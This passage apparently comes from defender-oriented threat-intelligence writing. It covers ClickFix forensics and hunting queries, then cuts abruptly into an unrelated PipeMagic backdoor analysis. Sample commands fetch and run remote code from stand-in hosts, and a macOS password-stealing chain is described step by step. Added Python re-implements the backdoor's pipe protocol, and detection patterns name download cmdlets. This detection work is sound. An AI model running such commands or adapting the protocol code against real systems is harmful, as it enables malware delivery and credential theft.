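The verdict deliberately requires both halves of the technique: a clipboard write plus either verification wording or paste-and-run instructions, because a share button that writes location.href is legitimate and would otherwise be flagged. The recovered command can be fed straight into the RunMRU indicators discussed later in the post, and a page whose command is built at runtime (string concatenation, downloaded from another server) will return no command, which is itself worth a second look.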
The “fix”: User-level code execution
The ClickFix technique typically presents its “fix” by instructing users to run malicious commands or code in the Windows Run dialog box. We assess that the threat actors who use this technique are banking on the idea that most of their targets aren’t familiar with this Windows OS component and what it’s used for, unlike the more advanced users doing system administrator tasks. Early ClickFix lures instructed users to run commands manually and directly in Windows Terminal or Windows PowerShell. However, multiple line warnings might have deterred potential victims from running these commands, leading to the threat actors changing their tactics.
Figure 23. Example of a multiple line warning in Windows Terminal
Detecting Windows Run dialog misuse
The Windows Run dialog (Win + R) is a trusted shell input user interface (UI) that’s part of Windows Explorer (explorer.exe). Internally, it uses the ShellExecute or CreateProcess APIs to resolve and launch commands. The input is limited to MAX_PATH, a null-terminated string (\0) with a practical maximum of 259 characters. Additionally, as part of the Run dialog, Windows loads the tiptsf.dll module into explorer.exe. This DLL is related to the Text Services Framework (TSF), which provides an input processor interface.
Figure 24. The Windows Run dialog box
Entering commands into the Run dialog leaves forensic traces, most notably in the RunMRU (Most Recently Used) registry key. This key keeps a history of Run dialog executions and can be used to reconstruct user-initiated activity during investigations. Note that no registry entry is created if the process execution fails.
Figure 25. RunMRU registry key entry with a malicious ClickFix command
To determine whether a ClickFix command execution is potentially occurring in the environment, check whether the RunMRU entries reference LOLBins (such as powershell, mshta, rundll32, wscript, curl, and wget) that can execute code and/or download payloads. PowerShell continues to be the most leveraged native binary, with the cmdlets iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) appearing very frequently.
Additional suspicious elements to check in entries within the RunMRU registry key include the following:
First-stage payloads are often hosted on direct IP addresses, content delivery network (CDN) domains, unusual top-level domains (for example, .live, .shop, .icu), or paste sites.
First-stage payloads are often delivered and/or launched as specific file types, such as .html, .hta, .txt, .zip, .msi, .bat, .ps1, or .vbs
Script files might be renamed with media extensions (such as .png, .mp3, .mp4, .wav, and .jpg) to hide their true intent.
The file might use a double extension for evasion (for example, file.hta.mp4)
URLs are often shortened using services such as Bitly.
A fake reCAPTCHA, CAPTCHA, or Turnstile confirmation is included, such as the following:
✅ “I am not a robot – reCAPTCHA Verification ID: XXXX”
# # I am not a robot: CAPTCHA Verification UID: XXXX\
# “Human, not a robot: CAPTCHA: Verification ID: XXXX”
✔️ “Cloud identificator:XXXX”
Figure 26. Examples of generic ClickFix commands
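The indicators above can be applied mechanically to the contents of the RunMRU key. The following Python script is an added example, not code from the original post or from Microsoft: it triages constructed RunMRU values against the page’s list of LOLBins, download cmdlets, IP-hosted and suspicious-TLD URLs, URL shorteners, media and double extensions, fake CAPTCHA tags, and the non-Latin script ranges used in the page’s hunting query. The registry data, the hosts captcha-check.icu and 203.0.113.7, the bit.ly path, and the tinyurl.com entry are constructed or assumed for the example.

```python
import re

# Indicators taken from the page's RunMRU guidance and the script ranges in its
# hunting query; entries marked "assumed" are this example's additions.
LOLBINS = {"powershell", "pwsh", "mshta", "rundll32", "wscript", "cscript",
           "curl", "wget", "bitsadmin", "forfiles", "msiexec", "cmd"}
DOWNLOAD_CMDLETS = ("iwr", "invoke-webrequest", "irm", "invoke-restmethod", "iex",
                    "invoke-expression", "downloadstring", "downloadfile", "frombase64string")
SUSPICIOUS_TLDS = (".live", ".shop", ".icu")
SHORTENERS = {"bit.ly", "tinyurl.com"}  # bit.ly is named on the page; tinyurl.com is assumed
SCRIPT_EXTS = "html|hta|txt|zip|msi|bat|ps1|vbs"
MEDIA_EXTS = "png|mp3|mp4|wav|jpg|ogg"
CAPTCHA_MARKERS = ("✅", "✔️", "i am not a robot", "verification id",
                   "verification uid", "cloud identificator")
NON_LATIN = re.compile(r"[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F"
                       r"\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
URL_RE = re.compile(r"https?://[^\s\"'()]+")
IPV4_HOST = re.compile(r"^(\d{1,3}\.){3}\d{1,3}(:\d+)?$")
DOUBLE_EXT = re.compile(rf"\.({SCRIPT_EXTS})\.({MEDIA_EXTS})\b")
MEDIA_EXT = re.compile(rf"\.({MEDIA_EXTS})\b")

# Constructed RunMRU export (value name -> data). Windows appends a literal "\1"
# to every stored command; MRUList holds the order, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "ecdba",
    "a": r"\\fileserver\share\1",
    "b": r"powershell -w h -ep bypass -c iex (iwr http://203.0.113.7/x.mp3 -useb)\1",
    "c": r'mshta https://captcha-check.icu/verify.hta.mp4 ✅ "I am not a robot - reCAPTCHA Verification ID: 7811"\1',
    "d": r"notepad C:\Users\alice\notes.txt\1",
    "e": r'cmd /c "powershell -NoP -W Hidden -c irm https://bit.ly/4xyz | iex" Подтверждение\1',
}


def strip_mru_suffix(data: str) -> str:
    """RunMRU stores each command followed by a literal backslash-1; remove it."""
    return data[:-2] if data.endswith("\\1") else data


def triage_command(data: str) -> list[str]:
    """Return the ClickFix indicators matched by one RunMRU command value, in a fixed order."""
    cmd = strip_mru_suffix(data)
    low = cmd.lower()
    hits: list[str] = []

    # LOLBin anywhere in the command, matched on the file name without path or .exe
    tokens = re.split(r"[\s\"'&|;(),]+", low)
    names = {t.replace("/", "\\").rsplit("\\", 1)[-1].removesuffix(".exe") for t in tokens}
    lolbins = sorted(names & LOLBINS)
    if lolbins:
        hits.append("lolbin:" + ",".join(lolbins))

    cmdlets = [c for c in DOWNLOAD_CMDLETS if re.search(rf"\b{re.escape(c)}\b", low)]
    if cmdlets:
        hits.append("download-cmdlet:" + ",".join(cmdlets))

    for url in URL_RE.findall(low):
        host = url.split("/")[2]
        if IPV4_HOST.match(host):
            hits.append("ip-hosted-url")
        if host.endswith(SUSPICIOUS_TLDS):
            hits.append("suspicious-tld:" + host)
        if host in SHORTENERS:
            hits.append("url-shortener:" + host)

    if DOUBLE_EXT.search(low):
        hits.append("double-extension")
    elif lolbins and MEDIA_EXT.search(low):
        hits.append("media-extension-payload")  # a script launcher pointed at a "media" file

    if any(m in low for m in CAPTCHA_MARKERS):
        hits.append("fake-captcha-tag")
    if NON_LATIN.search(cmd):
        hits.append("non-latin-script")
    return hits


def triage_runmru(values: dict[str, str]) -> dict[str, list[str]]:
    """Triage every command in a RunMRU key, most recent first per MRUList."""
    order = [n for n in values.get("MRUList", "") if n in values]
    order += [n for n in values if n != "MRUList" and n not in order]
    return {n: triage_command(values[n]) for n in order}


def suspicious_entries(values: dict[str, str]) -> dict[str, list[str]]:
    """Only the entries that matched at least one indicator."""
    return {n: h for n, h in triage_runmru(values).items() if h}


if __name__ == "__main__":
    for name, hits in suspicious_entries(SAMPLE_RUNMRU).items():
        print(f"{name}: {strip_mru_suffix(SAMPLE_RUNMRU[name])}\n    {', '.join(hits)}")
```

The values are read from a dict because the key is usually collected offline (a registry export or a forensic image); on a live host the same dict can be filled from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with the winreg module. The trailing "\1" that Windows appends is the reason the page’s hunting query excludes the bare "mshta.exe\1" value, and the script strips it before matching. A lone LOLBin hit (for example, a user who runs cmd from the dialog) is low signal on its own; as in the hunting query, the combination with a download cmdlet, an odd host, or a fake CAPTCHA tag is what makes an entry worth pulling.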
Obfuscation and execution techniques for defense evasion
The command examples in the previous section aren’t all encompassing, as we’ve observed threat actors employing a growing number of obfuscation and execution techniques for defense evasion. These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters, among others.
Figure 27. Example of a ClickFix command that used nested PowerShell, string obfuscation through concatenated ampersand (“&”) delimiters, and a benign-sounding phrase (for example, “Microsoft Defender Services Secure Access”)
Figure 28. Example of a ClickFix command that used LOLBin stacking (repeated cmd.exe) and obfuscation through escape characters (^)
Figure 29. Example of a ClickFix command that was obfuscated using string splitting and concatenation, indexed character access through the $1 command string, and ampersand execution
Beyond Windows: ClickFix targeting macOS users
In June 2025, a ClickFix campaign was reported to be targeting macOS users to deliver Atomic macOS Stealer (AMOS). This new campaign is yet another mark in the continuously evolving threat landscape, as the ClickFix technique was previously observed to be more common in Windows-based attacks.
The campaign, which according to our analysis goes back to late May 2025, redirected target users to ClickFix-themed delivery websites impersonating Spectrum, a US-based company that provides cable television, internet access, and unified communications services:
Figure 30. ClickFix landing page with a fake CAPTCHA
As in other ClickFix campaigns, when the user clicks the Alternate verification button, the page displays instructions the user has to follow to “fix” their issue. Interestingly, the steps the lure displays, even to macOS users, are for Windows devices:
Figure 31. ClickFix instructions presented to the target user
Meanwhile, in the background, a malicious command is copied to the user’s clipboard. The command that is copied is different for macOS and Windows devices.
Windows:
Figure 32. Screenshot of the ClickFix command copied on Windows devices
macOS:
Figure 33. Screenshot of the ClickFix command copied on macOS devices
The command that’s copied for macOS devices instructs the system to perform the following actions:
Get the current user: username=$(whoami)
Prompt for the password: repeatedly display a “System Password:” prompt until the user enters the correct one
Validate the password: use dscl . -authonly to verify it against macOS directory services
Store the password: save the validated password to the /tmp/.pass file
Remove quarantine: use the stolen password with sudo -S xattr -c to strip the extended attributes, including the com.apple.quarantine flag that Gatekeeper checks, from the downloaded file
Make the file executable: chmod +x /tmp/update
Launch the malware: run the downloaded file /tmp/update
The file saved as update within the tmp directory belongs to the AMOS malware family. AMOS variants such as Poseidon and Odyssey are known to steal user information, including browser cookies, passwords, and cryptocurrency wallet credentials.
Behind the click: ClickFix kits and other services for sale
Microsoft Threat Intelligence has observed several threat actors selling the ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files. The kits offer creation of landing pages with a variety of available lures including Cloudflare. They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. We’ve also discovered sellers that offer one-time and piece-meal solutions (for example, only the source code, landing page, or the command line) priced anywhere between US$200 and US$500.
Figures 34 and 35 show an example of a ClickFix builder that offers a variety of configurable options such as:
Displaying a decoy PDF file after a target user is phished
Payload execution timing
Virtual machine (VM) detection and evasion (“Anti VM”) and user access control (UAC) bypass
Visual template to be used, such as Google Meet, Google CAPTCHA, or Cloudflare
Language to be used, for example, English, German, Spanish, French, Italian, or Portuguese
Figure 34. Screenshot of a ClickFix builder, taken from the seller’s demo video
Figure 35. Another screenshot of a ClickFix builder, taken from the seller’s demo video
ClickFix protection and detection
Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers. For example, Microsoft Defender SmartScreen displays a warning to Microsoft Edge users when they visit a ClickFix landing page:
Figure 36. Microsoft Defender SmartScreen flagging a ClickFix landing page
Even if a user chooses to bypass the SmartScreen warning or is using a different web browser and is socially engineered into executing a command in the Run dialog, Microsoft Defender for Endpoint detects and mitigates the attack’s initial access activities, such as the suspicious process execution and command-line activity, during the process scan phase.
Most attack paths eventually lead to the execution of either PowerShell or HTA scripts. Microsoft’s Antimalware Scan Interface (AMSI) provides scanning capabilities for both scripting environments and PowerShell applications. Defender’s Cloud Protection delivers enhanced protection by monitoring and intercepting outgoing connections to malicious URLs as well as analyzing process execution patterns. Additionally, Microsoft Defender for Office 365 analyzes end-to-end links and HTML attachments, and has fake CAPTCHA behavioral signatures that proactively block ClickFix-related phishing emails.
Additional attack chain coverage with network protection
In early 2025, Microsoft Defender Experts observed thousands of devices being affected by a ClickFix attack (that is, the ClickFix command was executed by a user on the device) per month, even with an endpoint detection and response (EDR) solution enabled. Due to this, our researchers performed pattern-of-life analysis to follow the tactics, techniques, and procedures (TTPs) in the attack timeline and understand the gaps that could be filled so that the attack could be stopped at the initial access stage. Their research resulted in the automation of the analysis and collection of numerous obfuscated/encoded LOLBin commands observed in the RunMRU registry key, and they were able to successfully extract and block newly created malicious domains through Defender for Endpoint’s network protection feature. This feature is an important component of the protection against ClickFix because blocking the C2 domains early in the attack chain prevents the download and/or execution of first-stage payloads, effectively making the attack unsuccessful.
Recommendations
Microsoft Threat Intelligence recommends the following mitigations to reduce the impact of this threat.
Educate users to identify social engineering attacks.
Ensure users are aware of what they copy and paste.
Check your Microsoft 365 email filtering settings to ensure spoofed emails, spam, and emails with malware are blocked. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Defender for Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence. Turn on safe attachments policies to check attachments to inbound email.
Block web pages from automatically running Flash plugins.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands, providing visibility into malicious script execution that might otherwise evade traditional logging.
Use PowerShell execution policies such as AllSigned or RemoteSigned to help reduce the risk of malicious execution by ensuring that only trusted, signed scripts run, adding a layer of control. Note that execution policy is not a security boundary: it applies to script files rather than to commands pasted interactively, and it can be overridden per process with -ExecutionPolicy Bypass, so treat it as defense in depth rather than as a control that stops ClickFix on its own.
Use Group Policy to deploy hardening configurations throughout your environment, if certain features are not necessary:
Disable the Run dialog box (Win + R) and remove the Run option from the Start Menu by selecting User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu.
Create an App Control policy that prohibits the launch of native Windows binaries from Run. This can be accomplished by defining a rule based on the specific process that is launching binaries like PowerShell.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against PowerShell techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following Microsoft Defender for Endpoint alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:
Suspicious command in RunMRU registry
Use of living-off-the-land binary to run malicious code
Suspicious process executed PowerShell command
Suspicious PowerShell command line
Suspicious ‘SuspClickFix’ behavior was blocked
An active ‘SuspDown’ malware was prevented from executing via AMSI
Suspicious ‘MaleficAms’ behavior was blocked
An active ‘ClickFix’ malware in a command line was prevented from executing
‘ClickFix’ malware was prevented
Information stealing malware activity
Powershell made a suspicious network connection
Suspicious process launch by Rundll32.exe
Suspicious Rundll32 command-line
Suspicious Scheduled Task Process Launched
Microsoft Defender for Office 365
Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:
A potentially malicious URL click was detected
Email messages containing malicious URL removed after delivery
Email messages removed after delivery
A user clicked through to a potentially malicious URL
Suspicious email sending patterns detected
Email reported by user as malware or phish
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Check impact of an external threat article
Suspicious script analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
ClickFix commands execution
Identify ClickFix commands execution.
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
| where RegistryValueData has "✅"
or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe\\1", "mshta\\1"))
or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))
Lampion malware activity
The following query searches for the PowerShell command that Lampion malware activity uses to download malicious files.
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessParentFileName == "explorer.exe"
| where FileName has_any ("WScript.exe")
| where ProcessCommandLine contains "\"PowerShell.exe\" -windowstyle minimized -Command"
and ProcessCommandLine has "Invoke-WebRequest"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To know how Microsoft can help your team stop similar threats and prevent future compromise with human-led managed services, check out Microsoft Defender Experts for XDR.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Among the many advanced attacker tools that show how threat actors continuously evolve their tactics, techniques, and procedures (TTPs) to evade detection and maximize impact, PipeMagic stands out as particularly advanced. It is a highly modular backdoor used by Storm-2460 that masquerades as a legitimate open-source ChatGPT Desktop Application.
Beneath its disguise, PipeMagic is a sophisticated malware framework designed for flexibility and persistence. Once deployed, it can dynamically execute payloads while maintaining robust command-and-control (C2) communication via a dedicated networking module. As the malware receives and loads payload modules from C2, it grants the threat actor granular control over code execution on the compromised host. By offloading network communication and backdoor tasks to discrete modules, PipeMagic maintains a modular, stealthy, and highly extensible architecture, making detection and analysis significantly challenging.
Microsoft Threat Intelligence encountered PipeMagic as part of research on an attack chain involving the exploitation of CVE-2025-29824, an elevation of privilege vulnerability in the Windows Common Log File System (CLFS). We attributed PipeMagic to the financially motivated threat actor Storm-2460, who leveraged the backdoor in targeted attacks to exploit this zero-day vulnerability and deploy ransomware. The observed targets of Storm-2460 span multiple sectors and geographies, including the information technology (IT), financial, and real estate sectors in the United States, Europe, South America, and the Middle East. While the number of impacted organizations remains limited, the use of a zero-day exploit, paired with a sophisticated modular backdoor for ransomware deployment, makes this threat particularly notable.
This blog provides a comprehensive technical deep dive that adds to public reporting, including by ESET Research and Kaspersky. Our analysis reveals the wide-ranging scope of PipeMagic’s internal architecture, modular payload delivery and execution mechanisms, and encrypted inter-process communication via named pipes.
The blog aims to equip defenders and incident responders with the knowledge needed to detect, analyze, and respond to this threat with confidence. As malware continues to evolve and become more sophisticated, we believe that understanding threats such as PipeMagic is essential for building resilient defenses for any organization. By exposing the inner workings of this malware, we also aim to disrupt adversary tooling and increase the operational cost for the threat actor, making it more difficult and expensive for them to sustain their campaigns.
PipeMagic: Technical analysis
PipeMagic has been used by Storm-2460 in multiple instances as part of pre-exploitation activity for attack chains involving CVE-2025-29824. Microsoft Threat Intelligence observed Storm-2460 using the certutil utility to download a file from a legitimate website that was previously compromised to host the threat actor’s malware. The downloaded payload is a malicious MSBuild file that ultimately drops and executes PipeMagic in memory. Once PipeMagic is running, the threat actor performs the CLFS exploit to escalate privileges before launching their ransomware.
The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source ChatGPT Desktop Application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.
The embedded payload is the PipeMagic malware, a modular backdoor that communicates with its C2 server over TCP. Once active, PipeMagic receives payload modules through a named pipe and its C2 server. The malware self-updates by storing these modules in memory using a series of doubly linked lists. These lists serve distinct purposes for staging, execution, and communication, enabling the threat actor to interact and manage the backdoor’s capabilities throughout its lifecycle.
Internal linked list structures
In our analysis, we identified the use of four distinct doubly linked list structures, each serving a unique function within the backdoor’s architecture:
Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
Network linked list: Contains networking modules responsible for C2 communication.
Unknown linked list: This structure lacks an immediately observable function. Based on behavioral analysis, we hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
In the next sections, we will detail how each of these linked lists is populated and utilized as we walk through the malware’s execution flow and capabilities.
Populating the payload linked list
The malware uses a doubly linked list structure to manage its payload modules, with each node encapsulating a payload in its raw Windows Portable Executable (PE) format. Before initializing this list, the malware generates a 16-byte random bot identifier unique to the infected host.
Figure 1. Bot ID generation
It then spawns a dedicated thread to establish a named pipe for payload delivery. The pipe is created using the format '\\.\pipe\1.<Bot ID hex string>', where the bot ID is the randomly generated 16-byte ID above, rendered as hexadecimal.
Figure 2. Pipe name generation
A bidirectional named pipe is established, enabling both read and write operations between the malware (acting as the pipe client) and the payload delivery mechanism (pipe server). The malware continuously listens on this pipe, reading incoming payload modules in a loop. For each module, the malware reads the payload’s length from the pipe, allocates memory accordingly, reads the payload content, and adds it to the payload module linked list.
Figure 3. Connecting and reading pipe data
The structure below represents the layout of the pipe data being delivered to the malware from the pipe server.
struct pipe_data_struct
{
    DWORD module_setup_flag;       // add module node (1) or stop reading pipe (2)
    DWORD module_index;            // module index
    DWORD module_name;             // module name
    DWORD module_body_len;         // length of module data
    DWORD module_body_SHA1_hash;   // SHA1 hash of module data
    BYTE  module_body[];           // pointer to module data
};
After the pipe data is read, the malware extracts the module body and decrypts it using RC4 with the following hardcoded 32-byte key:
The malware then computes the SHA-1 hash of the decrypted data and compares it against the hash provided in the pipe data to verify integrity.
Figure 4. Decrypting module data and performing hash validation
Upon successful validation, the malware constructs the following node structure representing the payload module and inserts it at the head of the payload linked list. This same structure is also used later in the execute linked list.
struct __declspec(align(8)) module_node
{
    module_node *next;               // next node
    module_node *prev;               // previous node
    DWORD module_index;              // module index
    DWORD exec_ll_module_index;      // module index in the execute linked list
    BYTE  *module_data_ptr;          // module pointer
    DWORD module_data_len;           // module length
    DWORD module_name;               // module name
    int   module_entry;              // module entrypoint
    int   module_attribute;          // attribute (4: aPLib compressed, 8: RC4 encrypted, 12: both)
    BYTE  module_initialized_flag;   // initialized flag
    BYTE  *module_hash_ptr;          // module SHA1 hash
    DWORD module_hash_len;           // module SHA1 hash length
};
Figure 5. Populating payload module with pipe data
The malware communicates the result of this operation back to the pipe server using the following response codes:
Code | Description
0x0 | Success – module node created and inserted
0x1 | Invalid pipe data size
0x3 | Failed to create a payload module node
0xA | SHA-1 hashing of module data failed
0xB | Hash mismatch – integrity check failed
This thread remains active throughout the backdoor’s lifecycle, allowing the threat actor to continuously deliver new payloads through the named pipe. The thread only terminates when the malware receives a module setup flag value of 2 in the pipe data, signaling the end of payload delivery.
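The pipe exchange described above (the pipe name derived from the bot ID, the pipe_data_struct frame, RC4 decryption followed by SHA-1 validation, and the response codes) as an added Python example; this is not code from the PipeMagic sample or from Microsoft. Two assumptions are made: the frame is modelled as the four leading DWORDs of pipe_data_struct followed by a 20-byte SHA-1 digest and the body (the struct above declares the hash field as a DWORD, but a SHA-1 digest is 20 bytes and module_node keeps a hash pointer plus length, so the 20-byte width is the example's assumption), and the RC4 key is a placeholder because the real 32-byte key is not reproduced on this page. The regex and build_frame helper are additions for hunting and for constructing test frames; they are not part of the malware.

```python
import hashlib
import re
import struct

# Response codes written back to the pipe server (from the table above).
RESP_OK = 0x0             # module node created and inserted
RESP_BAD_SIZE = 0x1       # invalid pipe data size
RESP_NODE_FAILED = 0x3    # node allocation failed (not simulated here)
RESP_HASH_FAILED = 0xA    # SHA-1 computation failed (not simulated here)
RESP_HASH_MISMATCH = 0xB  # integrity check failed

FLAG_ADD_MODULE = 1       # module_setup_flag: add a node
FLAG_STOP = 2             # module_setup_flag: stop reading the pipe

# Placeholder key for the example only; the sample's real key is not on this page.
EXAMPLE_RC4_KEY = bytes(range(0x20, 0x40))

# module_setup_flag, module_index, module_name, module_body_len (little-endian DWORDs)
HEADER = struct.Struct("<IIII")
SHA1_LEN = 20  # assumption: the hash field carries a full 20-byte digest


def make_pipe_name(bot_id: bytes) -> str:
    # Pipe name format from the page: \\.\pipe\1.<bot ID as 32 hex chars>
    if len(bot_id) != 16:
        raise ValueError("bot ID must be 16 bytes")
    return r"\\.\pipe\1." + bot_id.hex()


# Hunting helper: the same naming pattern, matched against pipe-creation telemetry.
PIPE_NAME_RE = re.compile(r"^\\\\\.\\pipe\\1\.[0-9a-f]{32}$", re.IGNORECASE)


def looks_like_pipemagic_pipe(name: str) -> bool:
    return PIPE_NAME_RE.match(name) is not None


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_frame(index: int, name: int, module: bytes, key: bytes = EXAMPLE_RC4_KEY,
                flag: int = FLAG_ADD_MODULE) -> bytes:
    """What the pipe server writes: header, SHA-1 of the plaintext module, RC4 body."""
    digest = hashlib.sha1(module).digest()
    body = rc4(key, module)
    return HEADER.pack(flag, index, name, len(body)) + digest + body


def handle_frame(frame: bytes, key: bytes = EXAMPLE_RC4_KEY):
    """The backdoor's side of one read: returns (response_code, node_or_None, stop)."""
    if len(frame) < HEADER.size + SHA1_LEN:
        return RESP_BAD_SIZE, None, False
    flag, index, name, body_len = HEADER.unpack_from(frame, 0)
    if flag == FLAG_STOP:                          # setup flag 2 ends the delivery thread
        return RESP_OK, None, True
    expected = frame[HEADER.size:HEADER.size + SHA1_LEN]
    body = frame[HEADER.size + SHA1_LEN:]
    if len(body) != body_len:
        return RESP_BAD_SIZE, None, False
    plain = rc4(key, body)                         # decrypt first ...
    if hashlib.sha1(plain).digest() != expected:   # ... then verify the decrypted data
        return RESP_HASH_MISMATCH, None, False
    node = {                                       # the module_node fields this step fills
        "module_index": index,
        "module_name": name,
        "module_data": plain,
        "module_data_len": len(plain),
        "module_hash": expected,
    }
    return RESP_OK, node, False
```

Note that the integrity check runs over the decrypted data, so a defender replaying captured pipe traffic needs the RC4 key before the digest tells them anything, and a tampered ciphertext byte surfaces only as response 0xB rather than as a decryption error.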
Malware configuration
The malware uses a well-defined configuration structure to manage its operational parameters.
The outermost configuration is represented by the following structure. It consists of a length field followed by a data buffer of that length:
If the config_len field is the constant 0x5A, the hardcoded configuration is deemed invalid, and the malware simply operates in local execution mode, communicating exclusively with the loopback interface at 127.0.0[.]1:8082. This mode is likely used for testing or staging purposes, allowing the malware to simulate C2 interactions without external network dependencies.
The config_data field itself contains multiple configuration blocks. Each block follows a consistent internal format:
The malware uses the block_index field to identify and retrieve specific configuration blocks as needed. Below is a breakdown of the known block indices and their corresponding data:
Block index | Block description | Block data
1 | C2 config block | aaaaabbbbbbb.eastus[.]cloudapp.azure[.]com:443
2 | Unknown | 43
3 | Backdoor's max up time | 172800
4 | Unknown | 120
It’s currently unclear how blocks with indices 2 and 4 are used. These values do not appear to influence the malware’s core functionality. However, they are transmitted to the C2 server alongside system information during the initial connection.
The data in block index 1 is itself another configuration block. It contains the actual C2 address used by the malware, which is aaaaabbbbbbb.eastus[.]cloudapp.azure[.]com:443. This domain has been disabled by Microsoft.
Figure 6. Extracting configuration
Launching networking module
The backdoor does not communicate with C2 directly. Instead, it delegates this task to a network module in the network linked list.
First, it populates the network linked list with module nodes. Each node contains an executable module responsible for handling C2 communication.
In the sample analyzed, the network module data is embedded within the backdoor binary. This data is first XOR-decrypted using the following hardcoded 32-byte key, then decompressed using the aPLib compression algorithm.
00000000 91 df 5d 0e 9c 64 cd bd c2 46 f2 4b 6b ce 4a dc |.ß]..dͽÂFòKkÎJÜ|
00000010 aa 38 f9 60 0f e4 e4 98 ed 05 46 f1 ca d9 54 c5 |ª8ù`.ää.í.FñÊÙTÅ|
Figure 7. Decrypting network module data
